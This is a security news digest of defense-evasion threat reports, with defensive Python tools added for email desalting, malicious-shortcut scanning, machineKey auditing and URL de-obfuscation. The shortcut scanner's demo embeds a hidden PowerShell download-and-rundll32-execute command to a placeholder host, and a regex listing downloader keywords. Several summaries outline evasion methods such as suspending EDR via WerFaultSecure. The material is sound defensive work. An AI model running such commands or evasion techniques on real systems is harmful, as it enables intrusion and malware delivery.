CISO Brief

All news with #defense evasion tag

124 articles · page 6 of 7

Attackers Exploit ScreenConnect Features for Network Access

🔒 DarkAtlas researchers warn that APT groups are leveraging legitimate RMM platforms for initial access and increasingly favour ScreenConnect because it evades basic detection. Attackers abuse built-in features such as unattended access, VPN, the REST API and file transfer, deploy in-memory installers that leave few disk artefacts, and register persistent services backed by binaries such as ScreenConnect.WindowsClient.exe. Defenders should monitor invite links, configuration files, in-memory activity and the relevant Windows event IDs to support DFIR.

Velociraptor Abused in LockBit Ransomware Campaign Wave

🔒 Threat actors are abusing Velociraptor, an open-source DFIR tool, to support ransomware operations attributed to Storm-2603. Attackers exploited on-premises SharePoint ToolShell flaws to deploy an outdated Velociraptor build (0.73.4.0) vulnerable to CVE-2025-6264, enabling privilege escalation and remote command execution. After lateral movement and creation of domain admin accounts, the group tampered with GPOs, disabled real‑time protection, and staged exfiltration before deploying Warlock, LockBit, and Babuk. Vendors caution that legitimate collection and orchestration capabilities can be repurposed by adversaries.

Threat actors abusing Velociraptor in ransomware attacks

⚠️ Researchers have observed threat actors leveraging the open-source DFIR tool Velociraptor to maintain persistent remote access and deploy ransomware families including LockBit and Babuk. Cisco Talos links the campaigns to a China-based group tracked as Storm-2603 and notes the use of an outdated Velociraptor build vulnerable to CVE-2025-6264. Attackers synchronized local admin accounts to Entra ID, accessed vSphere consoles, disabled Defender via AD GPOs, and used fileless PowerShell encryptors with per-run AES keys, staging exfiltration before encryption.

Hidden Text Salting in Emails and Strategic Cyber Decisions

🧯 Cisco Talos warns of extensive abuse of CSS to insert hidden “salt” — extraneous characters, comments and markup — into email preheaders, headers, attachments and bodies to evade detection. This hidden text salting technique is significantly more common in spam and malicious mail than in legitimate messages, undermining both signature and ML-based defenses. Talos advises detecting concealed content and, crucially, stripping or normalising that salt before passing messages to downstream engines, while also urging attention to longer-term strategic decision-making in cyber defense.

Hidden Text Salting: CSS Abuse in Email Threats and Evasion

🧂 Cisco Talos documents growing abuse of CSS to insert visually hidden 'salt' into emails, a technique that undermines parsing and language-detection systems. Observed across preheaders, headers, attachments and bodies between March 1, 2024 and July 31, 2025, attackers use CSS properties (font-size, opacity, display, clipping) and zero-width characters to conceal irrelevant content. Talos recommends detection plus HTML sanitization and filters—examples include Cisco Secure Email Threat Defense—to strip or ignore invisible content before downstream analysis.
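
The two Talos items above both end with the same advice: find the hidden text and strip it before the message reaches downstream engines. The following is an added example written for this page, not Cisco Talos code, showing one stdlib-only way to do that. It drops text inside elements hidden with the CSS properties the research names (font-size, opacity, display, visibility, clip), drops HTML comments and zero-width code points, and returns what it removed so a classifier can score both the clean text and the amount of salt. The sample message is constructed for the demo; the `example.invalid` link and the property list are assumptions, and a production build would also handle `<style>` blocks and positioning tricks.

```python
"""Strip CSS-hidden "salt" and zero-width characters from an HTML email body.

Added example (not Cisco Talos code). Stdlib only: drops text hidden with the
CSS properties the research names (font-size, opacity, display, visibility,
clip) plus HTML comments and zero-width code points, and reports what was
removed. The sample message below is constructed for the demo.
"""
import re
from html.parser import HTMLParser

# Code points that render as nothing but break tokenisation and language detection.
ZERO_WIDTH = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff"), None)

# Inline-style declarations that make an element (and everything inside it) invisible.
HIDDEN_STYLE = re.compile(
    r"(?:^|;)\s*(?:"
    r"display\s*:\s*none"
    r"|visibility\s*:\s*hidden"
    r"|opacity\s*:\s*0(?:\.0+)?(?![\d.])"
    r"|font-size\s*:\s*0(?:\.0+)?\s*(?:px|pt|em|rem|%)?"
    r"|clip\s*:\s*rect\(\s*0(?:px)?(?:\s*,?\s*0(?:px)?){3}\s*\)"
    r")\s*(?:!important)?\s*(?:;|$)",
    re.I,
)

NOT_RENDERED = {"head", "title", "style", "script", "template"}
VOID = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col", "wbr"}

VISIBLE, SALTED, UNRENDERED = 0, 1, 2


class SaltStripper(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.stack = []            # visibility state of each open element
        self.visible = []          # text a human would see
        self.salt = []             # hidden text segments that were dropped
        self.zero_width_removed = 0

    def _state(self):
        return self.stack[-1] if self.stack else VISIBLE

    def handle_starttag(self, tag, attrs):
        if tag in VOID:
            return
        own = VISIBLE
        if tag in NOT_RENDERED:
            own = UNRENDERED
        elif HIDDEN_STYLE.search(";" + (dict(attrs).get("style") or "")):
            own = SALTED
        self.stack.append(max(self._state(), own))   # a hidden parent hides its children

    def handle_endtag(self, tag):
        if tag not in VOID and self.stack:
            self.stack.pop()

    def handle_data(self, data):
        state = self._state()
        if state == SALTED:
            self.salt.append(data)
        elif state == VISIBLE:
            cleaned = data.translate(ZERO_WIDTH)
            self.zero_width_removed += len(data) - len(cleaned)
            self.visible.append(cleaned)

    def handle_comment(self, data):
        self.salt.append(data)     # comments are a common salt carrier


def desalt(html: str) -> dict:
    """Return the visible text plus what was stripped, for scoring by later engines."""
    p = SaltStripper()
    p.feed(html)
    p.close()
    return {
        "text": " ".join("".join(p.visible).split()),
        "hidden_segments": p.salt,
        "zero_width_removed": p.zero_width_removed,
    }


# Constructed sample: preheader salt, split brand words, a comment and zero-width joiners.
SAMPLE_EMAIL = """<html><head><style>.x{color:red}</style></head><body>
<div style="display:none;max-height:0;overflow:hidden">Lorem ipsum dolor sit amet consectetur</div>
<p>Your <span style="font-size:0px">qz</span>account has been <span style="opacity:0">kk</span>suspended.</p>
<!-- salt 9f83a1b2 -->
<p>Click <a href="https://example.invalid/verify">Ver\u200bify\u200b now</a></p>
</body></html>"""

if __name__ == "__main__":
    print(desalt(SAMPLE_EMAIL))
```

Feed the message body through `desalt()` before signature matching or language detection; the ratio of `hidden_segments` to visible text is itself a usable feature, since legitimate mail rarely carries more than a preheader.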

Credential ZIP Lures Use Malicious LNKs to Deploy DLLs

📎 BlackPoint researchers tracked a campaign that distributes credential-themed ZIP archives containing malicious Windows shortcut (.lnk) files. When opened, the shortcuts launch minimized, obfuscated PowerShell that downloads DLL payloads disguised as .ppt files, saves them to the user profile and invokes them via rundll32.exe. The dropper assembles commands from byte arrays, probes for antivirus processes and uses quiet flags to minimize visible indicators. Recommended mitigations include blocking LNKs in archives, enforcing Mark of the Web, denying execution from user-writable locations, and enabling PowerShell script block logging and AMSI.
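
As an added example for the item above (written for this page, not Blackpoint's tooling), the script below shows how a mail gateway or sandbox can open a ZIP, find any .lnk entries and decode what the shortcut would launch. It parses just enough of the MS-SHLLINK format (the 76-byte header, the optional ID list and LinkInfo, then the string data) to recover the target, working directory, arguments and ShowCommand, and flags the traits the campaign relied on: a shortcut inside an archive, a script host or rundll32 in the target, and a minimized window. The archive and shortcut are built in memory for the demo and the download URL is a dummy; in practice you would also block the archive when Mark of the Web would not survive extraction.

```python
"""Find Windows shortcuts inside a ZIP and decode what they would launch.

Added example, not Blackpoint's tooling. Parses the MS-SHLLINK header, skips
the optional LinkTargetIDList and LinkInfo, then reads the StringData fields.
The archive and the shortcut inside it are constructed in memory for the demo.
"""
import io
import re
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7                                            # "launch minimized"
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                 (HAS_ARGUMENTS, "arguments"), (HAS_ICON, "icon_location"))

SUSPICIOUS = re.compile(
    r"powershell|pwsh|cmd\.exe|mshta|wscript|cscript|rundll32|regsvr32"
    r"|-enc|-w(?:indowstyle)?\s+hidden|-nop|bypass|iwr|invoke-webrequest|downloadstring|frombase64string",
    re.I,
)


def parse_lnk(data: bytes) -> dict:
    """Return the string data and ShowCommand of a shell link, or raise ValueError."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags, show_cmd = struct.unpack_from("<I", data, 20)[0], struct.unpack_from("<I", data, 60)[0]
    pos = 76
    if flags & HAS_ID_LIST:                      # LinkTargetIDList: 2-byte size, then the item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfo: 4-byte size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"show_command": show_cmd}
    for bit, name in STRING_FIELDS:              # StringData: 2-byte char count, no terminator
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                out[name] = data[pos:pos + 2 * n].decode("utf-16-le")
                pos += 2 * n
            else:
                out[name] = data[pos:pos + n].decode("cp1252", "replace")
                pos += n
    return out


def scan_archive(zip_bytes: bytes) -> list:
    """List every .lnk in the archive with the reasons it looks malicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                lnk = parse_lnk(zf.read(info))
            except ValueError:
                findings.append({"entry": info.filename, "target": "", "reasons": [".lnk name but not a shell link"]})
                continue
            target = " ".join(s for s in (lnk.get("relative_path", ""), lnk.get("arguments", "")) if s)
            reasons = ["shortcut inside archive"]
            if SUSPICIOUS.search(target):
                reasons.append("script host / downloader / rundll32 in target")
            if lnk["show_command"] == SW_SHOWMINNOACTIVE:
                reasons.append("launches minimized")
            findings.append({"entry": info.filename, "target": target, "reasons": reasons})
    return findings


# --- constructed sample (dummy URL, not a real campaign artefact) -------------
def build_lnk(relative_path: str, working_dir: str, arguments: str, show_cmd: int) -> bytes:
    def s(text):                                  # one StringData entry, UTF-16LE
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    flags = HAS_REL_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    return header + s(relative_path) + s(working_dir) + s(arguments)


def build_sample_zip() -> bytes:
    lnk = build_lnk(
        r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"%TEMP%",
        r'-NoP -W Hidden -Ep Bypass -C "iwr http://example.invalid/s.ppt -o $env:APPDATA\s.dll; rundll32 $env:APPDATA\s.dll,Run"',
        SW_SHOWMINNOACTIVE)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Credentials_2025.pdf.lnk", lnk)
        zf.writestr("readme.txt", "Please review the attached credentials.")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_archive(build_sample_zip()):
        print(f)
```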

LockBit 5.0 Released: Faster ESXi Encryption, Evasion

🔒 LockBit 5.0 introduces faster ESXi drive encryption and enhanced evasion techniques, according to Trend Micro. The release includes Windows, Linux and VMware ESXi variants featuring heavy obfuscation, ETW patching, DLL reflection and hypervisor-targeted encryption designed to amplify impact. Researcher Jon DiMaggio describes the update as largely incremental fine-tuning and self-branding aimed at restoring affiliate trust after Operation Cronos.

Operation Rewrite: BadIIS SEO Poisoning Campaign in Asia

🔍 Unit 42 uncovered Operation Rewrite, a March 2025 SEO poisoning campaign that deploys a native IIS implant called BadIIS to manipulate search engine indexing and redirect users to attacker-controlled scam sites. The implant registers request handlers, inspects User‑Agent and Referer headers, and proxies malicious content from remote C2 servers. Variants include lightweight ASP.NET page handlers, a managed .NET IIS module, and an all-in-one PHP front controller. Organizations can detect and block activity with Palo Alto Networks protections and should engage incident responders if compromised.

EDR-Freeze: WER-based Tool Suspends Windows Security

🔒 A new proof-of-concept named EDR-Freeze shows that Windows Error Reporting can be abused from user mode to suspend antivirus and EDR processes. The method launches WerFaultSecure, the protected-process WER dumper, against the target and has it call MiniDumpWriteDump, which suspends the target's threads while the dump is taken; the attacker then suspends WerFaultSecure itself before it finishes, so the target never resumes and the security agent is left inoperative with no kernel driver involved. Researcher TwoSevenOneThree validated the technique on Windows 11 24H2 and describes it as a design weakness rather than a classic vulnerability; defenders can monitor WER and WerFaultSecure invocations or harden the reporting components to mitigate the risk.

FileFix Campaign Uses Steganography and Multistage Payloads

🛡️ Acronis researchers have uncovered a rare FileFix campaign that hides a second-stage PowerShell script and encrypted executables inside JPG images using steganography. Multilingual, heavily minified phishing pages mimic a Meta support flow and trick victims into pasting a payload into the File Explorer address bar opened from a file-upload dialog. An obfuscated PowerShell one-liner then downloads the images from Bitbucket, extracts and decrypts the embedded components, and executes a Go-based loader that deploys StealC. Organizations should combine user training with process blocking and monitoring to mitigate this evolving threat.

Microsoft to Remove WMIC After Windows 11 25H2 Upgrade

🔧 Microsoft has announced that the legacy WMIC command-line tool will be removed after systems are upgraded to Windows 11 25H2 and later. Administrators are advised to migrate scripts and automation to PowerShell or programmatic alternatives such as WMI's COM API or .NET libraries. The change affects only the WMIC client; the underlying WMI infrastructure remains supported. Microsoft says the removal reduces complexity and limits abuse of WMIC by threat actors.

HybridPetya UEFI Bootkit Bypasses Secure Boot on PCs

🔒 HybridPetya is a newly identified UEFI bootkit that can bypass Secure Boot by exploiting CVE-2024-7344, enabling installation of malicious components into the EFI System Partition. ESET located a sample on VirusTotal and describes it as possibly a proof-of-concept, research project, or an early-stage criminal tool. The bootkit replaces the Windows bootloader, forces reboots to execute at startup, encrypts MFT clusters with Salsa20 while showing a fake CHKDSK, and then presents a ransom screen demanding a Bitcoin payment and a 32-character key to restore the bootloader and decrypt data.

Novel LOTL and File-Based Evasion Techniques Rising

🔍 The Q2 2025 HP Wolf Threat Insights Report describes how threat actors are increasingly chaining living-off-the-land (LOTL) tools and abusing uncommon file types to evade detection. Attackers hide final payloads inside images or use tiny SVGs that mimic legitimate interfaces, then execute code via native Windows processes such as MSBuild. These methods leverage trusted sites and native binaries to bypass filters and complicate incident response.

Fileless AsyncRAT infection leverages in-memory loaders

🔍 Security researchers at LevelBlue Labs identified an open-source Remote Access Trojan, AsyncRAT, being deployed via a multi-stage, fileless in-memory loader that avoids writing executables to disk. Attackers gained initial access through a compromised ConnectWise ScreenConnect client, executing a VBScript which invoked PowerShell to fetch two staged .NET assemblies. The first-stage assembly decodes payloads into byte arrays and uses reflection to run the secondary assembly directly in memory, while operators disabled AMSI and tampered with ETW to evade runtime detection. Persistence was achieved with a scheduled task disguised as "Skype Update," and the RAT used an AES-256 encrypted configuration to connect to a DuckDNS-based C2.

Fileless Malware Uses Legitimate Tools to Deploy AsyncRAT

🔍 Researchers uncovered a sophisticated fileless campaign that executes malicious code entirely in memory to deliver AsyncRAT. The attack began via a compromised ScreenConnect client and a VBScript that used WScript and PowerShell to download two payload blobs saved to C:\Users\Public\, which were never written as executables but loaded into memory via reflection. A .NET launcher (Obfuscator.dll) was used to orchestrate persistence, disable security logging and load the RAT, which exfiltrates credentials, browser artifacts and keystrokes.

Chinese APT Uses Fileless 'EggStreme' Against Military Firm

🔒 Bitdefender tracked a Chinese APT intrusion that used a novel, fileless framework dubbed EggStreme to compromise a Philippines-based military contractor. The multi-stage toolkit injects code directly into memory, leverages DLL sideloading and abuses legitimate Windows services for persistence, and delivers a gRPC-enabled backdoor, EggStremeAgent, with extensive reconnaissance and exfiltration capabilities. Bitdefender advises limiting use of high-risk binaries and deploying advanced detection and response to detect living-off-the-land operations and anomalous behavior.

Chinese APT Uses EggStreme Fileless Framework in Espionage

🛡️ Bitdefender attributed a campaign against a Philippines-based military contractor to a China-linked APT that deployed a previously undocumented fileless framework named EggStreme. The multi-stage operation begins with EggStremeFuel (mscorsvc.dll), which profiles systems, opens a C2 channel, stages loaders, and triggers in-memory execution of the core backdoor via DLL sideloading. EggStremeAgent functions as a central backdoor, injecting a session-specific keylogger (EggStremeKeylogger), communicating over gRPC, and exposing a 58-command toolkit for discovery, lateral movement, privilege escalation and data theft. An auxiliary implant, EggStremeWizard (xwizards.dll), provides reverse-shell access and resilient C2 options; Bitdefender warned that fileless execution and heavy DLL sideloading make detection and forensics difficult.

Sitecore ViewState Flaw Under Active Exploitation Now

⚠️ Mandiant reports attackers are actively exploiting a leaked ASP.NET machineKey sample from old Sitecore deployment guides to carry out ViewState code-injection attacks that execute arbitrary .NET assemblies in server memory. The issue, tracked as CVE-2025-53690, affects multi-instance deployments of Sitecore XM, XP, and XC that used the static sample key, and may also impact some Sitecore Managed Cloud Standard container configurations. After initial access, adversaries deploy tools Mandiant calls WEEPSTEEL and EARTHWORM, escalate to SYSTEM, create administrative accounts, dump SYSTEM/SAM hives, and move laterally. Sitecore customers are advised to inspect environments for indicators of compromise, rotate and encrypt <machineKey> entries, and follow Microsoft ASP.NET ViewState guidance.
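
The root cause above is a `<machineKey>` whose values an attacker already knows: whoever holds the validationKey can sign a ViewState that ASP.NET will deserialize. The added example below (written for this page, not Sitecore or Mandiant tooling) audits a web.config for explicit keys and weak algorithms and mints fresh random replacements. Because the page does not reproduce the leaked sample key, the check cannot match that specific value; it only tells you whether the keys are hard-coded, which is the condition you must then verify against the vendor guide and rotate. The sample configs are constructed for the demo.

```python
"""Audit an ASP.NET web.config <machineKey> and generate replacement keys.

Added example, not Sitecore or Mandiant tooling. Flags explicit (non-
AutoGenerate) keys and legacy algorithms, and produces fresh random keys:
64 bytes for HMACSHA256 validation, 32 bytes for AES decryption.
The sample configs below are constructed for the demo.
"""
import secrets
import xml.etree.ElementTree as ET

LEGACY_ALGORITHMS = {"MD5", "SHA1", "3DES", "DES"}


def audit_machine_key(web_config_xml: str) -> dict:
    """Report whether <machineKey> carries explicit keys and which algorithms it uses."""
    mk = ET.fromstring(web_config_xml).find("./system.web/machineKey")
    if mk is None:
        # No element: keys are auto-generated per app pool, which only works single-instance.
        return {"present": False, "static": False, "weak_algorithms": []}
    vk = mk.get("validationKey", "AutoGenerate,IsolateApps")
    dk = mk.get("decryptionKey", "AutoGenerate,IsolateApps")
    auto = lambda v: v.upper().startswith("AUTOGENERATE")
    weak = [a for a in (mk.get("validation", ""), mk.get("decryption", "")) if a.upper() in LEGACY_ALGORITHMS]
    return {
        "present": True,
        "static": not (auto(vk) and auto(dk)),   # explicit keys: must be unique, secret and encrypted
        "validation": mk.get("validation"),
        "decryption": mk.get("decryption"),
        "weak_algorithms": weak,
    }


def new_machine_key() -> dict:
    """Fresh keys from the OS CSPRNG, hex-encoded as ASP.NET expects."""
    return {
        "validationKey": secrets.token_hex(64).upper(),   # 64 bytes for HMACSHA256
        "decryptionKey": secrets.token_hex(32).upper(),   # 32 bytes for AES-256
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def render_machine_key(keys: dict) -> str:
    """Serialise the key set as the <machineKey .../> element to paste into web.config."""
    return ET.tostring(ET.Element("machineKey", dict(keys)), encoding="unicode")


# Constructed samples: a hard-coded (dummy, repeated-pattern) key and an auto-generated one.
STATIC_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="{v}" decryptionKey="{d}" validation="SHA1" decryption="AES" />
  </system.web>
</configuration>""".format(v="A1B2C3D4" * 16, d="E5F60718" * 6)

AUTO_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    print(audit_machine_key(STATIC_WEB_CONFIG))
    print(audit_machine_key(AUTO_WEB_CONFIG))
    print(render_machine_key(new_machine_key()))
```

A multi-instance farm needs identical keys on every node, so "static" is not itself the defect; the defect is a static key that is public or shared with other tenants. After rotating, protect the section with `aspnet_regiis -pe "system.web/machineKey" -app "/<site>"` so the new key is not stored in clear text, and expect existing sessions and ViewState to be invalidated.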

Tycoon Phishing Kit Uses New Link Obfuscation Techniques

🔐 Barracuda researchers have detailed new link-obfuscation capabilities in the Tycoon phishing-as-a-service kit that hide malicious destinations from both scanners and recipients. Observed techniques include padding URLs with percent-encoded spaces (%20), deceptive Unicode characters, hidden codes appended to links, redundant protocol prefixes, and subdomain manipulation. Attacks also incorporate a fake CAPTCHA stage and tooling aimed at bypassing multi-factor authentication, making email-based social engineering more effective and harder for traditional filters to catch.
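
As an added example for the item above (written for this page, not Barracuda's code), the script below recovers the destination a browser would actually open and reports which of the listed tricks were present: it percent-decodes the link, strips a redundant leading scheme and the padding spaces, then checks the host for mixed scripts or compatibility characters, for a brand name parked in a subdomain of an unrelated registered domain, and for an opaque token appended after `#`. Assumptions for the demo are the brand watch-list, a two-label "registered domain" heuristic (use the public suffix list in production) and the constructed sample URLs on example.net and microsoftonline.com.

```python
"""Flag the link-obfuscation tricks Barracuda describes in the Tycoon kit.

Added example, not Barracuda's code. Assumed for the demo: the brand list,
a two-label registered-domain heuristic, and the constructed sample URLs.
"""
import re
import unicodedata
from urllib.parse import unquote

BRANDS = ("microsoft", "office", "outlook", "sharepoint", "docusign")   # assumed watch-list

# A second scheme inside the authority part: "https://https://host" or "http://www.https://host".
NESTED_SCHEME = re.compile(r"^https?://[^/?#]*?(?=https?://)", re.I)


def canonicalise(url: str) -> str:
    """Recover the destination a browser would actually open."""
    u = unquote(url)
    while (m := NESTED_SCHEME.match(u)):
        u = u[m.end():]                      # keep the innermost scheme://host
    return re.sub(r"\s+", "", u)             # spaces only survive here from %20 padding


def host_of(url: str) -> str:
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/?#]*)", url, re.I)
    authority = m.group(1) if m else ""
    host = authority.rsplit("@", 1)[-1]      # drop userinfo
    return host.split(":")[0].lower().rstrip(".")


def scripts_of(text: str) -> set:
    """Unicode script names of the letters in text, e.g. {'LATIN', 'CYRILLIC'}."""
    return {unicodedata.name(c, "?").split()[0] for c in text if c.isalpha()}


def analyse_url(url: str) -> dict:
    flags = []
    decoded = unquote(url)
    if NESTED_SCHEME.match(decoded):
        flags.append("redundant_scheme")
    if re.search(r"(?:%20|%09|%0a|%0d){2,}", url, re.I):
        flags.append("percent_padding")
    canon = canonicalise(url)
    host = host_of(canon)
    # Fullwidth/compatibility forms normalise away; mixed scripts betray homoglyphs.
    if unicodedata.normalize("NFKC", host) != host or len(scripts_of(host)) > 1:
        flags.append("deceptive_unicode")
    labels = host.split(".")
    if len(labels) > 2:
        registered, sub = ".".join(labels[-2:]), ".".join(labels[:-2])
        if any(b in sub and b not in registered for b in BRANDS):
            flags.append("brand_in_subdomain")
    fragment = canon.partition("#")[2]
    if re.fullmatch(r"[A-Za-z0-9+/=_-]{20,}", fragment):
        flags.append("appended_code")       # opaque token after '#', e.g. an encoded victim address
    return {"canonical": canon, "host": host, "flags": flags}


# Constructed samples (example.net / .invalid names, not real campaign URLs).
SAMPLE_URLS = {
    "tycoon_style": "https://https://microsoft-login.example.net/%20%20%20%20%20%20%20%20verify#dXNlckBleGFtcGxlLmNvbQ==",
    "homoglyph": "https://www.micr\u043esoft.com/login",      # Cyrillic 'о' in place of Latin 'o'
    "benign": "https://login.microsoftonline.com/",
}

if __name__ == "__main__":
    for name, u in SAMPLE_URLS.items():
        print(name, analyse_url(u))
```

Run the canonical form, not the raw link, through reputation lookups; the raw form is what the padding and nested schemes are designed to defeat.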

Silver Fox Abuses Signed WatchDog Driver to Disable AV

🚨 Check Point attributes a BYOVD campaign to the Silver Fox actor that leverages a Microsoft-signed WatchDog kernel driver (amsdk.sys v1.0.600) to neutralize endpoint defenses. The operation uses a dual-driver approach—an older Zemana-based driver on Windows 7 and the WatchDog driver on Windows 10/11—to terminate processes and escalate privileges. An all-in-one loader bundles anti-analysis checks, embedded drivers, AV-killer logic, and a ValleyRAT downloader to establish persistent remote access.